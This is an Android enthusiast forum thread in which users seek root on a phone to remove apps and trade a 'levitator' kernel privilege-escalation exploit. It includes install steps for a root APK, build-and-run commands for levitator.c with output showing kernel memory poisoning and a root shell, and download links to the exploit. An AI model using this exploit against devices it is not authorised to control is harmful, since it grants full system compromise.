akutasame94
Well-Known Member
True... The sad thing is that I just need root, so I can delete and install some apps. I don't need custom roms at all, I am happy with the one I have.
Follow along with the video below to see how to install our site as a web app on your home screen.
Note: This feature may not be available in some browsers.
Fwiw, poot didn't work on the Avid...
Isnt the avid ics?
X-Ray for Android
i used this app and found out that our phone is vulnerable to this "levitator" exploit...can this be any useful?
how can you make it work? can't find a program that roots it with this exploit?
Method 2 - Levitator
- You need to install SuperUser separately from the market (but only once), if you don't already have it on your phone.
- Then install m9.r00t.apk.
- Open it, press "Get r00t", wait for confirmation (very fast), and that's it!
The app has inbuilt auto start - activate once, and then your phone will be temprooted on boot. To disable, press "Un00t phone"
Multiupload.nl - upload your files to multiple file hosting sites!
found it and installed it but when i click root nothing happens lol
Multiupload.nl - upload your files to multiple file hosting sites!
found it and installed it but when i click root nothing happens lol
i have the program lemme find it
www.shabbypenguin.com/OUDstuff/Random/Coolpad/quattro/levitator
youll need to run this via adbshell/terminal
$ CC="/path/to/arm-linux-androideabi-gcc"
* $ NDK="/path/to/ndk/arch-arm"
* $ CFLAGS="-I$NDK/usr/include/"
* $ LDFLAGS="-Wl,-rpath-link=$NDK/usr/lib -L$NDK/usr/lib -nostdlib $NDK/usr/lib/crtbegin_dynamic.o -lc"
* $ $CC -o levitator levitator.c $CFLAGS $LDFLAGS
* $ adb push levitator /data/local/tmp/
* $ adb shell
* $ cd /data/local/tmp
* $ ./levitator
* [+] looking for symbols...
* [+] resolved symbol commit_creds to 0xc00770dc
* [+] resolved symbol prepare_kernel_cred to 0xc0076f64
* [+] resolved symbol dev_attr_ro to 0xc05a5834
* [+] opening prvsrvkm device...
* [+] dumping kernel memory...
* [+] searching kmem for dev_attr_ro pointers...
* [+] poisoned 16 dev_attr_ro pointers with fake_dev_attr_ro!
* [+] clobbering kmem with poisoned pointers...
* [+] triggering privesc via block ro sysfs attribute...
* [+] restoring original dev_attr_ro pointers...
* [+] restored 16 dev_attr_ro pointers!
* [+] privileges escalated, enjoy your shell!
* # id
* uid=0(root) gid=0(root)
When you say run via adbshell/terminal (I have terminal emulator installed on my phone) do you mean I should type all of this or just one part or something completely different?
congrats you just found it, gimme a bit and ill make a one click script that will install root
www.shabbypenguin.com/OUDstuff/Random/ZTE/mimosa-mini/levitator root.zip
enable usb debugging
extract teh zip and run teh script within
ive never used this exploit so lemme know h ow this all works out
www.shabbypenguin.com/OUDstuff/Random/ZTE/mimosa-mini/levitator%20root.zip
enable usb debugging
extract teh zip and run teh script within
ive never used this exploit so lemme know h ow this all works out